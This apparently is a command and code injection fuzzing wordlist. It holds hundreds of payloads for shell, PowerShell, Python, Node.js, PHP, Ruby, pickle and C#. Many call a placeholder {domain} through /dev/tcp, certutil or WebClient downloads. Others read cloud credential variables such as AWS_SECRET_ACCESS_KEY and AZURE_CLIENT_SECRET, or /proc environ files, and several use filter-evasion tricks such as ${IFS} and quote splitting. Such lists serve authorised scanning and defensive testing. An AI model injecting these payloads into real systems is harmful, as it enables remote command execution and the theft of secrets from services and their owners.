1;powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')${IFS};#${IFS}’;powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')${IFS};#${IFS}”;powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')${IFS};#${IFS}
1;powershell -c Invoke-WebRequest 'http://{domain}'${IFS};#${IFS}’;powershell -c Invoke-WebRequest 'http://{domain}'${IFS};#${IFS}”;powershell -c Invoke-WebRequest 'http://{domain}'${IFS};#${IFS}
1;printenv${IFS};#${IFS}’;printenv${IFS};#${IFS}”;printenv${IFS};#${IFS}
1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS}
; /bin/bash -c "true > /dev/tcp/{domain}/80"
; /bin/sh -c "true > /dev/tcp/{domain}/80"
; certutil -urlcache -f 'http://{domain}'
; exec 6< /dev/tcp/{domain}/80
; ping {domain} -c 2
; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
; powershell -c Invoke-WebRequest 'http://{domain}'
@{[system "/bin/bash -c 'true > /dev/tcp/{domain}/80'"]}
@{[system "/bin/sh -c 'true > /dev/tcp/{domain}/80'"]}
@{[system "certutil -urlcache -f 'http://{domain}'"]}
@{[system "exec 6< /dev/tcp/{domain}/80"]}
@{[system "powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')"]}
@{[system "powershell -c Invoke-WebRequest 'http://{domain}'"]}
`/bin/bash -c "true > /dev/tcp/{domain}/80"`
`/bin/sh -c "true > /dev/tcp/{domain}/80"`
`certutil -urlcache -f 'http://{domain}'`
`exec 6< /dev/tcp/{domain}/80`
`powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')`
`powershell -c Invoke-WebRequest 'http://{domain}'`
certutil -urlcache -f 'http://{domain}'
certutil -urlcache -f 'http://{domain}' &certutil -urlcache -f 'http://{domain}' ; certutil -urlcache -f 'http://{domain}'  &certutil -urlcache -f 'http://{domain}' ; certutil -urlcache -f 'http://{domain}' & certutil -urlcache -f 'http://{domain}' ; certutil -urlcache -f 'http://{domain}'  & certutil -urlcache -f 'http://{domain}'
certutil -urlcache -f 'http://{domain}'&&certutil -urlcache -f 'http://{domain}'; certutil -urlcache -f 'http://{domain}' &&certutil -urlcache -f 'http://{domain}'; certutil -urlcache -f 'http://{domain}'&& certutil -urlcache -f 'http://{domain}'; certutil -urlcache -f 'http://{domain}' && certutil -urlcache -f 'http://{domain}'
certutil -urlcache -f 'http://{domain}'||id; certutil -urlcache -f 'http://{domain}' ||id; certutil -urlcache -f 'http://{domain}'|| id; certutil -urlcache -f 'http://{domain}' || id
exec 6< /dev/tcp/{domain}/80
exec 6< /dev/tcp/{domain}/80 &exec 6< /dev/tcp/{domain}/80 ; exec 6< /dev/tcp/{domain}/80  &exec 6< /dev/tcp/{domain}/80 ; exec 6< /dev/tcp/{domain}/80 & exec 6< /dev/tcp/{domain}/80 ; exec 6< /dev/tcp/{domain}/80  & exec 6< /dev/tcp/{domain}/80
exec 6< /dev/tcp/{domain}/80&&exec 6< /dev/tcp/{domain}/80; exec 6< /dev/tcp/{domain}/80 &&exec 6< /dev/tcp/{domain}/80; exec 6< /dev/tcp/{domain}/80&& exec 6< /dev/tcp/{domain}/80; exec 6< /dev/tcp/{domain}/80 && exec 6< /dev/tcp/{domain}/80
exec 6< /dev/tcp/{domain}/80||id; exec 6< /dev/tcp/{domain}/80 ||id; exec 6< /dev/tcp/{domain}/80|| id; exec 6< /dev/tcp/{domain}/80 || id
id %0A /bin/bash -c "true > /dev/tcp/{domain}/80"
id %0A /bin/sh -c "true > /dev/tcp/{domain}/80"
id %0A certutil -urlcache -f 'http://{domain}'
id %0A exec 6< /dev/tcp/{domain}/80
id %0A ping {domain} -c 2
id %0A powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
id %0A powershell -c Invoke-WebRequest 'http://{domain}'
id %0A printenv
ls|/bin/bash -c "true > /dev/tcp/{domain}/80"; ls |/bin/bash -c "true > /dev/tcp/{domain}/80"; ls| /bin/bash -c "true > /dev/tcp/{domain}/80"; ls | /bin/bash -c "true > /dev/tcp/{domain}/80"
ls|/bin/sh -c "true > /dev/tcp/{domain}/80"; ls |/bin/sh -c "true > /dev/tcp/{domain}/80"; ls| /bin/sh -c "true > /dev/tcp/{domain}/80"; ls | /bin/sh -c "true > /dev/tcp/{domain}/80"
ls|certutil -urlcache -f 'http://{domain}'; ls |certutil -urlcache -f 'http://{domain}'; ls| certutil -urlcache -f 'http://{domain}'; ls | certutil -urlcache -f 'http://{domain}'
ls|exec 6< /dev/tcp/{domain}/80; ls |exec 6< /dev/tcp/{domain}/80; ls| exec 6< /dev/tcp/{domain}/80; ls | exec 6< /dev/tcp/{domain}/80
ls|ping {domain} -c 2; ls |ping {domain} -c 2; ls| ping {domain} -c 2; ls | ping {domain} -c 2
ls|powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'); ls |powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'); ls| powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'); ls | powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
ls|powershell -c Invoke-WebRequest 'http://{domain}'; ls |powershell -c Invoke-WebRequest 'http://{domain}'; ls| powershell -c Invoke-WebRequest 'http://{domain}'; ls | powershell -c Invoke-WebRequest 'http://{domain}'
ls|printenv; ls |printenv; ls| printenv; ls | printenv
p"r"i"n"tenv
p'r'i'n'tenv
ping {domain} -c 2
ping {domain} -c 2 &ping {domain} -c 2 ; ping {domain} -c 2  &ping {domain} -c 2 ; ping {domain} -c 2 & ping {domain} -c 2 ; ping {domain} -c 2  & ping {domain} -c 2
ping {domain} -c 2&&ping {domain} -c 2; ping {domain} -c 2 &&ping {domain} -c 2; ping {domain} -c 2&& ping {domain} -c 2; ping {domain} -c 2 && ping {domain} -c 2
ping {domain} -c 2||id; ping {domain} -c 2 ||id; ping {domain} -c 2|| id; ping {domain} -c 2 || id
powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') &powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') ; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')  &powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') ; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') & powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') ; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')  & powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')&&powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'); powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') &&powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'); powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')&& powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}'); powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') && powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')||id; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') ||id; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')|| id; powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}') || id
powershell -c Invoke-WebRequest 'http://{domain}'
powershell -c Invoke-WebRequest 'http://{domain}' &powershell -c Invoke-WebRequest 'http://{domain}' ; powershell -c Invoke-WebRequest 'http://{domain}'  &powershell -c Invoke-WebRequest 'http://{domain}' ; powershell -c Invoke-WebRequest 'http://{domain}' & powershell -c Invoke-WebRequest 'http://{domain}' ; powershell -c Invoke-WebRequest 'http://{domain}'  & powershell -c Invoke-WebRequest 'http://{domain}'
powershell -c Invoke-WebRequest 'http://{domain}'&&powershell -c Invoke-WebRequest 'http://{domain}'; powershell -c Invoke-WebRequest 'http://{domain}' &&powershell -c Invoke-WebRequest 'http://{domain}'; powershell -c Invoke-WebRequest 'http://{domain}'&& powershell -c Invoke-WebRequest 'http://{domain}'; powershell -c Invoke-WebRequest 'http://{domain}' && powershell -c Invoke-WebRequest 'http://{domain}'
powershell -c Invoke-WebRequest 'http://{domain}'||id; powershell -c Invoke-WebRequest 'http://{domain}' ||id; powershell -c Invoke-WebRequest 'http://{domain}'|| id; powershell -c Invoke-WebRequest 'http://{domain}' || id
printenv %0A id
printenv&&printenv; printenv &&printenv; printenv&& printenv; printenv && printenv
printenv&printenv; printenv &printenv; printenv& printenv; printenv & printenv
printenv||id; printenv ||id; printenv|| id; printenv || id
{cat,/proc/1/environ}
{cat,/proc/10/environ}
{cat,/proc/2/environ}
{cat,/proc/3/environ}
{cat,/proc/4/environ}
{cat,/proc/5/environ}
{cat,/proc/6/environ}
{cat,/proc/7/environ}
{cat,/proc/8/environ}
{cat,/proc/9/environ}
{cat,/proc/self/environ}
{ping,{domain},\-c2}
{sleep,9}
| /bin/bash -c "true > /dev/tcp/{domain}/80"
| /bin/sh -c "true > /dev/tcp/{domain}/80"
| certutil -urlcache -f 'http://{domain}'
| exec 6< /dev/tcp/{domain}/80
| ping {domain} -c 2
| powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
| powershell -c Invoke-WebRequest 'http://{domain}'
timeout 5
| timeout 5
& timeout 5
&& timeout 5
;timeout 5
ping%PROGRAMFILES:~10,-5%IP
ping%CommonProgramFiles:~10,-18%IP
| ping%PROGRAMFILES:~10,-5%IP
| ping%CommonProgramFiles:~10,-18%IP
& ping%PROGRAMFILES:~10,-5%IP
& ping%CommonProgramFiles:~10,-18%IP
&& ping%PROGRAMFILES:~10,-5%IP
&& ping%CommonProgramFiles:~10,-18%IP
;ping%CommonProgramFiles:~10,-18%IP
;ping%PROGRAMFILES:~10,-5%IP
ping%127.0.0.1:~10,-5%IP
ping%127.0.0.1:~10,-18%IP
| ping%127.0.0.1:~10,-5%IP
| ping%127.0.0.1:~10,-18%IP
& ping%127.0.0.1:~10,-5%IP
& ping%127.0.0.1:~10,-18%IP
&& ping%127.0.0.1:~10,-5%IP
&& ping%127.0.0.1:~10,-18%IP
;ping%127.0.0.1:~10,-18%IP
;ping%127.0.0.1:~10,-5%IP
| systeminfo
; systeminfo
& systeminfo
&& systeminfo
certutil -urlcache -f 'http://{domain}'
| certutil -urlcache -f 'http://{domain}'
& certutil -urlcache -f 'http://{domain}'
&& certutil -urlcache -f 'http://{domain}'
;certutil -urlcache -f 'http://{domain}'
powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
| powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
& powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
&& powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
;powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')
powershell -c Invoke-WebRequest 'http://{domain}'
| powershell -c Invoke-WebRequest 'http://{domain}'
& powershell -c Invoke-WebRequest 'http://{domain}'
&& powershell -c Invoke-WebRequest 'http://{domain}'
;powershell -c Invoke-WebRequest 'http://{domain}'
${{<%[%'"}}%\
-
--
-v
--version
-h
--help
+++ATH0
$USER
--use-compress-program=nslookup {domain} -domain=a.jpg
$(ping {domain})
() { 0; }; ping {domain};
() { _; } >_[$($())] { ping {domain}; }
/dev/null; ping {domain} ; echo
@{[system "ping {domain}"]}
<<< %s(un='%s') = %u
%x('printenv /')
(666*666)
abs(-443556)
__import__("time").sleep(9)
__import__("subprocess").getoutput("id")
__import__("subprocess").getoutput("net user")
__import__("subprocess").getoutput("printenv")
__import__("subprocess").getoutput("set")
__import__("urllib.request").request.urlopen("http://{domain}")
__import__("urllib.request").request.urlopen("https://{domain}")
__import__("subprocess").getoutput("/bin/bash -c \"true > /dev/tcp/{domain}/80 \"")
__import__("subprocess").getoutput("certutil -urlcache -f 'http://{domain}'"")
__import__("os").system("/bin/bash -c 'true > /dev/tcp/{domain}/80'")
__import__("os").system("exec 6< /dev/tcp/{domain}/80")
__import__("os").system("certutil -urlcache -f 'http://{domain}'")
__import__("os").system("exec 6< /dev/tcp/{domain}/80")
__import__("os").system("ping {domain} -c 2")
__import__("os").system("powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')")
__import__("os").system("powershell -c Invoke-WebRequest 'http://{domain}'")
__import__("os").uname()
__import__("os").environ["HOME"]
__import__("os").environ["PATH"]
__import__("os").environ["Path"]
__import__("os").environ["PWD"]
__import__("os").environ["HOSTNAME"]
__import__("os").environ["USERNAME"]
__import__("os").environ["OS"]
__import__("os").environ["AWS_ACCESS_KEY_ID"]
__import__("os").environ["AWS_SECRET_ACCESS_KEY"]
__import__("os").environ["AWS_SESSION_TOKEN"]
__import__("os").environ["EC2_TOKEN"]
__import__("os").environ["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]
__import__("os").environ["GCP_PROJECT"]
__import__("os").environ["COMPOSER_GKE_NAME"]
__import__("os").environ["GOOGLE_APPLICATION_CREDENTIALS"]
__import__("os").environ["AZURE_TENANT_ID"]
__import__("os").environ["AZURE_CLIENT_ID"]
__import__("os").environ["AZURE_CLIENT_SECRET"]
__import__("os").environ["AZURE_USERNAME"]
__import__("os").environ["AZURE_PASSWORD"]
eval("666*666")
eval("(666*666)")
eval("abs(-443556)")
eval("__import__(\"time\").sleep(9)")
eval("__import__(\"subprocess\").getoutput(\"id\")")
eval("__import__(\"subprocess\").getoutput(\"net user\")")
eval("__import__(\"subprocess\").getoutput(\"printenv\")")
eval("__import__(\"subprocess\").getoutput(\"set\")")
eval("__import__(\"urllib.request\").request.urlopen(\"http://{domain}\")")
eval("__import__(\"urllib.request\").request.urlopen(\"https://{domain}\")")
eval("__import__(\"subprocess\").getoutput(\"/bin/bash -c \\"true > /dev/tcp/{domain}/80 \\"\")")
eval("__import__(\"subprocess\").getoutput(\"certutil -urlcache -f \'http://{domain}\'\"\")")
eval("__import__(\"os\").system(\"/bin/bash -c \'true > /dev/tcp/{domain}/80\'\")")
eval("__import__(\"os\").system(\"exec 6< /dev/tcp/{domain}/80\")")
eval("__import__(\"os\").system(\"certutil -urlcache -f \'http://{domain}\'\")")
eval("__import__(\"os\").system(\"exec 6< /dev/tcp/{domain}/80\")")
eval("__import__(\"os\").system(\"ping {domain} -c 2\")")
eval("__import__(\"os\").system(\"powershell -c (New-Object Net.WebClient).DownloadString(\'http://{domain}\')\")")
eval("__import__(\"os\").system(\"powershell -c Invoke-WebRequest \'http://{domain}\'\")")
eval("__import__(\"os\").uname()")
eval("__import__(\"os\").environ[\"HOME\"]")
eval("__import__(\"os\").environ[\"PATH\"]")
eval("__import__(\"os\").environ[\"Path\"]")
eval("__import__(\"os\").environ[\"PWD\"]")
eval("__import__(\"os\").environ[\"HOSTNAME\"]")
eval("__import__(\"os\").environ[\"USERNAME\"]")
eval("__import__(\"os\").environ[\"OS\"]")
eval("__import__(\"os\").environ[\"AWS_ACCESS_KEY_ID\"]")
eval("__import__(\"os\").environ[\"AWS_SECRET_ACCESS_KEY\"]")
eval("__import__(\"os\").environ[\"AWS_SESSION_TOKEN\"]")
eval("__import__(\"os\").environ[\"EC2_TOKEN\"]")
eval("__import__(\"os\").environ[\"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\"]")
eval("__import__(\"os\").environ[\"GCP_PROJECT\"]")
eval("__import__(\"os\").environ[\"COMPOSER_GKE_NAME\"]")
eval("__import__(\"os\").environ[\"GOOGLE_APPLICATION_CREDENTIALS\"]")
eval("__import__(\"os\").environ[\"AZURE_TENANT_ID\"]")
eval("__import__(\"os\").environ[\"AZURE_CLIENT_ID\"]")
eval("__import__(\"os\").environ[\"AZURE_CLIENT_SECRET\"]")
eval("__import__(\"os\").environ[\"AZURE_USERNAME\"]")
eval("__import__(\"os\").environ[\"AZURE_PASSWORD\"]")
666*666
(666*666)
Math.abs(-443556)
require('child_process').execSync(`sleep 9`).toString();
require('child_process').execSync(`timeout 9`).toString();
require('child_process').execSync(`id`).toString();
require('child_process').execSync(`net user`).toString();
require('child_process').execSync(`printenv`).toString();
require('child_process').execSync(`set`).toString();
http.get('http://{domain}')
https.get('https://{domain}')
require('http').get('http://{domain}')
require('https').get('https://{domain}')
require('child_process').execSync(`/bin/bash -c 'true > /dev/tcp/{domain}/80'`).toString();
require('child_process').execSync(`exec 6< /dev/tcp/{domain}/80`).toString();
require('child_process').execSync(`certutil -urlcache -f 'http://{domain}'`).toString();
require('child_process').execSync(`exec 6< /dev/tcp/{domain}/80`).toString();
require('child_process').execSync(`ping {domain} -c 2`).toString();
require('child_process').execSync(`powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')`).toString();
require('child_process').execSync(`powershell -c Invoke-WebRequest 'http://{domain}'`).toString();
process.env.HOME
process.env.PATH
process.env.Path
process.env.PWD
process.env.HOSTNAME
process.env.USERNAME
process.env.OS
process.env.AWS_ACCESS_KEY_ID
process.env.AWS_SECRET_ACCESS_KEY
process.env.AWS_SESSION_TOKEN
process.env.EC2_TOKEN
process.env.AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
process.env.GCP_PROJECT
process.env.COMPOSER_GKE_NAME
process.env.GOOGLE_APPLICATION_CREDENTIALS
process.env.AZURE_TENANT_ID
process.env.AZURE_CLIENT_ID
process.env.AZURE_CLIENT_SECRET
process.env.AZURE_USERNAME
process.env.AZURE_PASSWORD
eval(666*666)
eval((666*666))
eval(Math.abs(-443556))
eval(require('child_process').execSync(`sleep 9`).toString();)
eval(require('child_process').execSync(`timeout 9`).toString();)
eval(require('child_process').execSync(`id`).toString();)
eval(require('child_process').execSync(`net user`).toString();)
eval(require('child_process').execSync(`printenv`).toString();)
eval(require('child_process').execSync(`set`).toString();)
eval(http.get('http://{domain}'))
eval(https.get('https://{domain}'))
eval(require('http').get('http://{domain}'))
eval(require('https').get('https://{domain}'))
eval(require('child_process').execSync(`/bin/bash -c 'true > /dev/tcp/{domain}/80'`).toString();)
eval(require('child_process').execSync(`exec 6< /dev/tcp/{domain}/80`).toString();)
eval(require('child_process').execSync(`certutil -urlcache -f 'http://{domain}'`).toString();)
eval(require('child_process').execSync(`exec 6< /dev/tcp/{domain}/80`).toString();)
eval(require('child_process').execSync(`ping {domain} -c 2`).toString();)
eval(require('child_process').execSync(`powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')`).toString();)
eval(require('child_process').execSync(`powershell -c Invoke-WebRequest 'http://{domain}'`).toString();)
eval(process.env.HOME)
eval(process.env.PATH)
eval(process.env.Path)
eval(process.env.PWD)
eval(process.env.HOSTNAME)
eval(process.env.USERNAME)
eval(process.env.OS)
eval(process.env.AWS_ACCESS_KEY_ID)
eval(process.env.AWS_SECRET_ACCESS_KEY)
eval(process.env.AWS_SESSION_TOKEN)
eval(process.env.EC2_TOKEN)
eval(process.env.AWS_CONTAINER_CREDENTIALS_RELATIVE_URI)
eval(process.env.GCP_PROJECT)
eval(process.env.COMPOSER_GKE_NAME)
eval(process.env.GOOGLE_APPLICATION_CREDENTIALS)
eval(process.env.AZURE_TENANT_ID)
eval(process.env.AZURE_CLIENT_ID)
eval(process.env.AZURE_CLIENT_SECRET)
eval(process.env.AZURE_USERNAME)
eval(process.env.AZURE_PASSWORD)
666*666
(666*666)
abs(-443556)
sleep(9)
file_get_contents("http://{domain}")
curl_exec(curl_init("https://{domain}"))
exec("sleep 9")
exec("timeout 9")
exec("id")
exec("net user")
exec("printenv")
exec("set")
exec("/bin/bash -c 'true > /dev/tcp/{domain}/80'")
exec("exec 6< /dev/tcp/{domain}/80")
exec("certutil -urlcache -f 'http://{domain}'")
exec("exec 6< /dev/tcp/{domain}/80")
exec("ping {domain} -c 2")
exec("powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')")
exec("powershell -c Invoke-WebRequest 'http://{domain}'")
shell_exec("sleep 9")
shell_exec("timeout 9")
shell_exec("id")
shell_exec("net user")
shell_exec("printenv")
shell_exec("set")
shell_exec("/bin/bash -c 'true > /dev/tcp/{domain}/80'")
shell_exec("exec 6< /dev/tcp/{domain}/80")
shell_exec("certutil -urlcache -f 'http://{domain}'")
shell_exec("exec 6< /dev/tcp/{domain}/80")
shell_exec("ping {domain} -c 2")
shell_exec("powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')")
shell_exec("powershell -c Invoke-WebRequest 'http://{domain}'")
getenv(HOME)
getenv(PATH)
getenv(Path)
getenv(PWD)
getenv(HOSTNAME)
getenv(USERNAME)
getenv(OS)
getenv(AWS_ACCESS_KEY_ID)
getenv(AWS_SECRET_ACCESS_KEY)
getenv(AWS_SESSION_TOKEN)
getenv(EC2_TOKEN)
getenv(AWS_CONTAINER_CREDENTIALS_RELATIVE_URI)
getenv(GCP_PROJECT)
getenv(COMPOSER_GKE_NAME)
getenv(GOOGLE_APPLICATION_CREDENTIALS)
getenv(AZURE_TENANT_ID)
getenv(AZURE_CLIENT_ID)
getenv(AZURE_CLIENT_SECRET)
getenv(AZURE_USERNAME)
getenv(AZURE_PASSWORD)
eval("echo 666*666;");
eval("echo (666*666);");
eval("echo abs(-443556);");
eval("echo sleep(9);");
eval("echo file_get_contents(\"http://{domain}\");");
eval("echo curl_exec(curl_init(\"https://{domain}\"));");
eval("echo exec(\"sleep 9\");");
eval("echo exec(\"timeout 9\");");
eval("echo exec(\"id\");");
eval("echo exec(\"net user\");");
eval("echo exec(\"printenv\");");
eval("echo exec(\"set\");");
eval("echo exec(\"/bin/bash -c \'true > /dev/tcp/{domain}/80\'\");");
eval("echo exec(\"exec 6< /dev/tcp/{domain}/80\");");
eval("echo exec(\"certutil -urlcache -f \'http://{domain}\'\");");
eval("echo exec(\"exec 6< /dev/tcp/{domain}/80\");");
eval("echo exec(\"ping {domain} -c 2\");");
eval("echo exec(\"powershell -c (New-Object Net.WebClient).DownloadString(\'http://{domain}\')\");");
eval("echo exec(\"powershell -c Invoke-WebRequest \'http://{domain}\'\");");
eval("echo shell_exec(\"sleep 9\");");
eval("echo shell_exec(\"timeout 9\");");
eval("echo shell_exec(\"id\");");
eval("echo shell_exec(\"net user\");");
eval("echo shell_exec(\"printenv\");");
eval("echo shell_exec(\"set\");");
eval("echo shell_exec(\"/bin/bash -c \'true > /dev/tcp/{domain}/80\'\");");
eval("echo shell_exec(\"exec 6< /dev/tcp/{domain}/80\");");
eval("echo shell_exec(\"certutil -urlcache -f \'http://{domain}\'\");");
eval("echo shell_exec(\"exec 6< /dev/tcp/{domain}/80\");");
eval("echo shell_exec(\"ping {domain} -c 2\");");
eval("echo shell_exec(\"powershell -c (New-Object Net.WebClient).DownloadString(\'http://{domain}\')\");");
eval("echo shell_exec(\"powershell -c Invoke-WebRequest \'http://{domain}\'\");");
eval("echo getenv(HOME);");
eval("echo getenv(PATH);");
eval("echo getenv(Path);");
eval("echo getenv(PWD);");
eval("echo getenv(HOSTNAME);");
eval("echo getenv(USERNAME);");
eval("echo getenv(OS);");
eval("echo getenv(AWS_ACCESS_KEY_ID);");
eval("echo getenv(AWS_SECRET_ACCESS_KEY);");
eval("echo getenv(AWS_SESSION_TOKEN);");
eval("echo getenv(EC2_TOKEN);");
eval("echo getenv(AWS_CONTAINER_CREDENTIALS_RELATIVE_URI);");
eval("echo getenv(GCP_PROJECT);");
eval("echo getenv(COMPOSER_GKE_NAME);");
eval("echo getenv(GOOGLE_APPLICATION_CREDENTIALS);");
eval("echo getenv(AZURE_TENANT_ID);");
eval("echo getenv(AZURE_CLIENT_ID);");
eval("echo getenv(AZURE_CLIENT_SECRET);");
eval("echo getenv(AZURE_USERNAME);");
eval("echo getenv(AZURE_PASSWORD);");
666*666
(666*666)
-443556.abs
sleep(9)
require 'net/http'; puts Net::HTTP.get(URI('http://{domain}'))
require 'net/http'; puts Net::HTTP.get(URI('https://{domain}'))
`sleep 9`
`timeout 9`
`id`
`net user`
`printenv`
`set`
`/bin/bash -c 'true > /dev/tcp/{domain}/80'`
`exec 6< /dev/tcp/{domain}/80`
`certutil -urlcache -f 'http://{domain}'`
`exec 6< /dev/tcp/{domain}/80`
`ping {domain} -c 2`
`powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')`
`powershell -c Invoke-WebRequest 'http://{domain}'`
exec("sleep 9")
exec("timeout 9")
exec("id")
exec("net user")
exec("printenv")
exec("set")
exec("/bin/bash -c 'true > /dev/tcp/{domain}/80'")
exec("exec 6< /dev/tcp/{domain}/80")
exec("certutil -urlcache -f 'http://{domain}'")
exec("exec 6< /dev/tcp/{domain}/80")
exec("ping {domain} -c 2")
exec("powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')")
exec("powershell -c Invoke-WebRequest 'http://{domain}'")
system("sleep 9")
system("timeout 9")
system("id")
system("net user")
system("printenv")
system("set")
system("/bin/bash -c 'true > /dev/tcp/{domain}/80'")
system("exec 6< /dev/tcp/{domain}/80")
system("certutil -urlcache -f 'http://{domain}'")
system("exec 6< /dev/tcp/{domain}/80")
system("ping {domain} -c 2")
system("powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')")
system("powershell -c Invoke-WebRequest 'http://{domain}'")
ENV.keys
ENV["HOME"]
ENV["PATH"]
ENV["Path"]
ENV["PWD"]
ENV["HOSTNAME"]
ENV["USERNAME"]
ENV["OS"]
ENV["AWS_ACCESS_KEY_ID"]
ENV["AWS_SECRET_ACCESS_KEY"]
ENV["AWS_SESSION_TOKEN"]
ENV["EC2_TOKEN"]
ENV["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]
ENV["GCP_PROJECT"]
ENV["COMPOSER_GKE_NAME"]
ENV["GOOGLE_APPLICATION_CREDENTIALS"]
ENV["AZURE_TENANT_ID"]
ENV["AZURE_CLIENT_ID"]
ENV["AZURE_CLIENT_SECRET"]
ENV["AZURE_USERNAME"]
ENV["AZURE_PASSWORD"]
eval("666*666")
eval("(666*666)")
eval("-443556.abs")
eval("sleep(9)")
eval("require \'net/http\'; puts Net::HTTP.get(URI(\'http://{domain}\'))")
eval("require \'net/http\'; puts Net::HTTP.get(URI(\'https://{domain}\'))")
eval("`sleep 9`")
eval("`timeout 9`")
eval("`id`")
eval("`net user`")
eval("`printenv`")
eval("`set`")
eval("`/bin/bash -c \'true > /dev/tcp/{domain}/80\'`")
eval("`exec 6< /dev/tcp/{domain}/80`")
eval("`certutil -urlcache -f \'http://{domain}\'`")
eval("`exec 6< /dev/tcp/{domain}/80`")
eval("`ping {domain} -c 2`")
eval("`powershell -c (New-Object Net.WebClient).DownloadString(\'http://{domain}\')`")
eval("`powershell -c Invoke-WebRequest \'http://{domain}\'`")
eval("exec(\"sleep 9\")")
eval("exec(\"timeout 9\")")
eval("exec(\"id\")")
eval("exec(\"net user\")")
eval("exec(\"printenv\")")
eval("exec(\"set\")")
eval("exec(\"/bin/bash -c \'true > /dev/tcp/{domain}/80\'\")")
eval("exec(\"exec 6< /dev/tcp/{domain}/80\")")
eval("exec(\"certutil -urlcache -f \'http://{domain}\'\")")
eval("exec(\"exec 6< /dev/tcp/{domain}/80\")")
eval("exec(\"ping {domain} -c 2\")")
eval("exec(\"powershell -c (New-Object Net.WebClient).DownloadString(\'http://{domain}\')\")")
eval("exec(\"powershell -c Invoke-WebRequest \'http://{domain}\'\")")
eval("system(\"sleep 9\")")
eval("system(\"timeout 9\")")
eval("system(\"id\")")
eval("system(\"net user\")")
eval("system(\"printenv\")")
eval("system(\"set\")")
eval("system(\"/bin/bash -c \'true > /dev/tcp/{domain}/80\'\")")
eval("system(\"exec 6< /dev/tcp/{domain}/80\")")
eval("system(\"certutil -urlcache -f \'http://{domain}\'\")")
eval("system(\"exec 6< /dev/tcp/{domain}/80\")")
eval("system(\"ping {domain} -c 2\")")
eval("system(\"powershell -c (New-Object Net.WebClient).DownloadString(\'http://{domain}\')\")")
eval("system(\"powershell -c Invoke-WebRequest \'http://{domain}\'\")")
eval("ENV.keys")
eval("ENV[\"HOME\"]")
eval("ENV[\"PATH\"]")
eval("ENV[\"Path\"]")
eval("ENV[\"PWD\"]")
eval("ENV[\"HOSTNAME\"]")
eval("ENV[\"USERNAME\"]")
eval("ENV[\"OS\"]")
eval("ENV[\"AWS_ACCESS_KEY_ID\"]")
eval("ENV[\"AWS_SECRET_ACCESS_KEY\"]")
eval("ENV[\"AWS_SESSION_TOKEN\"]")
eval("ENV[\"EC2_TOKEN\"]")
eval("ENV[\"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\"]")
eval("ENV[\"GCP_PROJECT\"]")
eval("ENV[\"COMPOSER_GKE_NAME\"]")
eval("ENV[\"GOOGLE_APPLICATION_CREDENTIALS\"]")
eval("ENV[\"AZURE_TENANT_ID\"]")
eval("ENV[\"AZURE_CLIENT_ID\"]")
eval("ENV[\"AZURE_CLIENT_SECRET\"]")
eval("ENV[\"AZURE_USERNAME\"]")
eval("ENV[\"AZURE_PASSWORD\"]")
cos%0Asystem%0A(S%27curl%20{domain}%27%0AtR.%0A
cos%0Asystem%0A(S%27hostname%27%0AtR.%0A
cos%0Asystem%0A(S%27ping%20-c%205%20127.0.0.1%27%0AtR.%0A
cos%0Asystem%0A(S%27ping%20-c%205%20{domain}%27%0AtR.%0A
cos%0Asystem%0A(S%27whoami%27%0AtR.%0A
new System.Diagnostics.ProcessStartInfo("/bin/bash -c 'true > /dev/tcp/{domain}/80'");
new System.Diagnostics.ProcessStartInfo("/bin/sh -c 'true > /dev/tcp/{domain}/80'");
new System.Diagnostics.ProcessStartInfo("certutil -urlcache -f 'http://{domain}'");
new System.Diagnostics.ProcessStartInfo("exec 6< /dev/tcp/{domain}/80");
new System.Diagnostics.ProcessStartInfo("ping {domain}");
new System.Diagnostics.ProcessStartInfo("powershell -c (New-Object Net.WebClient).DownloadString('http://{domain}')");
